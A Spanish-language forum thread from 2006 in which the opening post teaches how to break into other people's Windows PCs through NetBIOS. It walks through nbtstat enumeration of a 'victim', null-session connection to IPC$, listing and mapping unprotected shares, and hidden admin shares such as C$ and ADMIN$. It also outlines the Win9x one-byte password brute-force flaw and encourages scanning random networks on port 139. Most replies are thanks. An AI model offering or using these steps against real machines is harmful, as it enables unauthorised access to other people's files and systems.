Entrar a PC's por NetBIOS

Tema en 'Cementerio De Temas' iniciado por mala ninia, 4 May 2006.

  1. mala ninia

    mala ninia Usuario Nuevo nvl. 1
    37/41

    Registrado:
    29 Abr 2006
    Mensajes:
    58
    Me Gusta recibidos:
    0
    Algo que... Ya pas? de moda, pero una forma de aprender nuevas tecnicas.
    Para saber mejor como es que funciona una red, y cuales son los comandos b?sicos.


    ?NETBIOS?
    NETBIOS (Network Basic Output/Input System que en espa?ol Sistema B?sico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores. Tal vez habr?s o?do mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo microsoft, tratando de optimizar el NETBIOS para Windows.
    Es habitual o?r hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 tambi?n forman parte de este protocolo,
    NetBIOS-ns 137 TCP / UDP NetBIOS Name Service
    NetBIOS-dgm 138 TCP / UDP NetBIOS Datagram Service
    NetBIOS-ssn 139 TCP / UDP NetBIOS Session Service

    Para poder comprobar este ataque con ?xito debes tener instalado el protocolo en tu PC, para ello, si tienes Windows 95 / 98 /Me debes ir a
    INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexi?n a Internet por separado (s?lo necesitas activarlo en aquella que vayas a utilizar para el ataque.

    ENTRANDO POR NETBIOS
    Lo que se explica a continuaci?n se puede utilizar desde un windows para atacar otro windows, aunque el ataque est? pesado para NT ser?a muy similar si quisi?ramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en d?a existen maneras mas f?ciles y r?pidas de hacerlo, esta secci?n la he puesto s?lo como curiosidad.
    Una vez elegida la m?quina a la que quieres entrar solo necesitas el Ms-Dos, o el S?mbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:

    nbtstat -A 192.168.0.1
    (si lo que conoces es la IP de la victima)

    nbtstat -a nombre_del_PC
    (si conoces solo su nombre)

    pueden ocurrir varias cosas, si recibes:
    C:\WINDOWS>nbtstat -A 192.168.0.1
    Host not found.

    Pues queda claro que "not found" , o no est? conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)
    Si la respuesta es:


    C:\WINDOWS>nbtstat -A 192.168.0.1
    NetBIOS Remote Machine Name Table
    Name Type Status
    --------------------------------------------------------------
    NAME <00> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    NAME <03> UNIQUE Registered
    MAC Address = 00-00-00-00-00-00

    Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.
    Si recibimos:


    C:\WINDOWS>nbtstat -A 192.168.0.1
    NetBIOS Remote Machine Name Table
    Name Type Status
    ----------------------------------------------------------------
    NAME <00> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    NAME <03> UNIQUE Registered
    NAME <20> UNIQUE Registered
    WORKGROUP <1E> GROUP Registered
    MAC Address = 00-00-00-00-00-00

    En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.
    El IPC$ (Inter-Process Communication) es un recurso compartido oculto est?ndar en una m?quina NT , y es utilizado por el servidor para establecer comunicaci?n con otros equipos.
    Conect?ndose al IPC$ un intruso puede establecer una comunicaci?n valida con el servidor NT. Conect?ndose como null, el intruso puede establecer dicha comunicaci?n sin necesidad de introducir user:password.

    Para ello se utiliza el siguiente comando:
    c:\>net use \\[ip_de_la_v?ctima]\ipc$ "" /user:""
    The command completed successfully.
    Puedes ver qu? comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET

    C:\>net view \\192.168.0.1
    recibir?s algo as?:
    Shared resources at 192.168.0.1
    Share name Type Used as Comment
    ----------------------------------------------------
    NETLOGON Disk Logon server share
    Test Disk
    The command completed successfully.
    Es posible que ocurra:
    C:\>net view \\192.168.0.1
    System error 5 has occurred.
    Entonces primero tienes que establecer la "null session"
    C:\>net use \\192.168.0.1\ipc$ "" /user:""
    The command completed successfully.
    Ahora el C:\>net view \\192.168.0.1
    si funcionar?
    Para conectar a la carpeta compartida.
    The command completed successfully.
    Si escribes net use ahora, recibir?s algo as?:
    Status Local Remote Network
    -------------------------------------------------------------
    OK X: \\123.123.123.123\test Microsoft
    OK \\123.123.123.123\test Microsoft
    The command completed successfully.
    Para acceder directamente al PC solo tienes que:
    *escribir en el expl?rer \\192.168.0.1
    *INICIO / EJECUTAR y poner lo mismo \\192.168.0.1
    *Bot?n derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1
    *En una ventana de s?mbolo de sistema escribir:
    C:\>net use x: \\192.168.0.1\test
    y despu?s
    C:\>dir x:
    Este ataque solo funcionar? si la carpeta compartida no tiene pasword.
    Recuerda que un intruso no est? limitado a los recursos compartidos que aparecen con el net view.
    Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo . Por defecto NT
    crea el IPC$ y otro por cada partici?n (por ejemplo una m?quina que tiene C, D, y E tendr? sus correspondient es C$, D$, y E$).
    Tambi?n hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).

    CRAKEANDO LOS PASSWORDS
    ----[esta parte est? tomada del grupo DeepZone Digital Security]----
    El 24 de agosto del 2000 NS-FOCUS - http://www.nsfocus.com/ - hac?a p?blica una vulnerabilidad en la implementaci?n del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones m?s avanzadas de Windows 98.
    La vulnerabilidad en si misma no es m?s que un error de implementaci?n a la hora de establecer la longitud del password para validarlo ante una petici?n NETBIOS.
    Los sistemas vulnerables obtienen el n?mero de bytes a comparar para el password del paquete que reciben del cliente.
    Un usuario malicioso podr?a establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El n?mero de intentos que deber?a realizar ser?a tan s?lo de 256 (2 elevado a .
    El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versi?n 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.

    METODO R?PIDO
    Hoy en d?a ya no se usa todo ese m?todo de introducir los comandos, han surgido muchas utilidades que automatizan todo el proceso.
    Si no est?s detr?s de ning?n PC en concreto, y lo que quieres es probar todas estas cosas con un PC aleatorio (por supuesto, sin ?nimo de causar ning?n da?o) lo ?nico que necesitas es elegir un escaneador adecuado ,es decir, de NetBIOS, o al menos un escaneador de puertos apuntando al 139, despu?s escanear una red, y ver?s como empiezan a surgir muchos mas ordenadores mal protegidos, o desprotegidos de los
    que te imaginas.


    - Sinceramente no creo que si intentan hacer algo as? valla a funcionar, a menos que sea contra... Windows 9x. Igualmente, se que es f?cil de entender y que van a aprender un poco mas :buuu:
    Suerte !. By Unish.:aplauso:


    ------>::portalnet::<-----
     
  2. Burns

    Burns Usuario Habitual nvl.3 ★
    Administrador
    197/244

    Registrado:
    25 Ene 2006
    Mensajes:
    23.523
    Me Gusta recibidos:
    68
    Muy Buena informacion men...algunas cosillas no las sabia...y estamos probando...XD

    Uno habitualmente deja esto de lado...siendo que es muy efectivo...ahunq para xp hay otras alternativas...jejejejje

    Saludos
     
  3. Divine

    Divine Usuario Casual nvl. 2
    87/163

    Registrado:
    27 Jun 2006
    Mensajes:
    5.497
    Me Gusta recibidos:
    5
    mmm... inresante..... lo leere todo...se agradece
    saludos.....
     
  4. platillerox

    platillerox Usuario Nuevo nvl. 1
    17/41

    Registrado:
    1 Dic 2006
    Mensajes:
    189
    Me Gusta recibidos:
    1
    wena wena siempre es bueno aprender un poco mas:p
     
  5. TALY

    TALY Usuario Maestro nvl. 6 ★ ★ ★ ★
    687/812

    Registrado:
    19 Oct 2006
    Mensajes:
    78.075
    Me Gusta recibidos:
    21
    vale compadre
    por el aporte
    xaaaaaaaUC
    Gracias
    victor
     
  6. virox

    virox Usuario Casual nvl. 2
    87/163

    Registrado:
    9 Jul 2007
    Mensajes:
    9.206
    Me Gusta recibidos:
    16
    xD..se!. pero si no tiene activado el netbio el otro pc,,jodimos!!!...py para peor parece que por defecto viene desactivado!
     
  7. kasiki

    kasiki Usuario Casual nvl. 2
    36/41

    Registrado:
    20 Mar 2007
    Mensajes:
    1.133
    Me Gusta recibidos:
    0
    jajajajaj compadre esta wea yo la sabia del año 98 mas o menos :D

    ojala a alguien le sirva jajaja
     
  8. sacdracum

    sacdracum Usuario Casual nvl. 2
    37/41

    Registrado:
    25 Ago 2007
    Mensajes:
    1.132
    Me Gusta recibidos:
    1
    jaajjajjajj !!!!!
     
  9. PORTAL FOREVER

    PORTAL FOREVER Invitado

    gran aporte bueno bueno bueno
     
  10. SnaK_KiD

    SnaK_KiD Usuario Nuevo nvl. 1
    1/41

    Registrado:
    10 Oct 2007
    Mensajes:
    14
    Me Gusta recibidos:
    0
    se agradece men

    y si te hacen eso que se puede hacer?
     
  11. mishimasan

    mishimasan Usuario Nuevo nvl. 1
    17/41

    Registrado:
    30 Jul 2007
    Mensajes:
    103
    Me Gusta recibidos:
    1
    gracias por el aporte
     
  12. lizardpoet87

    lizardpoet87 Usuario Casual nvl. 2
    37/41

    Registrado:
    24 Feb 2007
    Mensajes:
    1.712
    Me Gusta recibidos:
    2
    gran aporte compadre.